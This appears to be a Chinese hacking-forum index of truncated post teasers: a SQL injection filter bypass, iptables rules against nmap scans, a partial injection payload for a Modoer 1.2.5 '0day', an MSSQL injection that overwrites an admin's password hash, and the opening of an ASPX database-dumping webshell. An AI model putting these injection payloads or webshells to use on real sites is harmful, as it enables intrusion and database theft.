-
突破sql注入过滤union SELECT继续注射
by:iEasyi老外确实牛B,感谢iEasyi的分享,学习了。。下载:http://u.115.com/file/bhbav712突破sql注入过滤union_SELECT继续射下去.rar...
-
阻止万恶的NMAP扫描你的系统
大大们办网站,首先要做的就是安全,一般黑客都会用nmap来扫描我们的网站这是我们所不希望看到的一下我提供几个过滤机制,nmap是无法扫描到你的1 #iptables -F 2 #iptables -A INPUT -p tcp --tcp-...
-
Modoer 1.2.5 注入0day 利用方法(爆错利用)
测试漏洞:ajax.php?action=digg&idtype=shop&keyid=* FROM modoer_admin Where id=1 and substring((Select adminname FROM...
-
SQL注入直接修改管理员密码的MD5值
直接修改管理员密码的MD5值 然后进后台!(条件 MSSQL)测试如下:http://www.xx.com/news.asp?id=121在地址后输入单引号,显示Microsoft OLE DB Provider for SQL Serve...
-
拖库涮库专用webshell
拖MSSQL的还可以。MYSQL的不行哦。现在貌似大库多是PHP。汗。等大牛放出PHP的吧出PHP的吧。<%@ Page Language="C#" %> <!DOCTYPE html PUBLIC &...
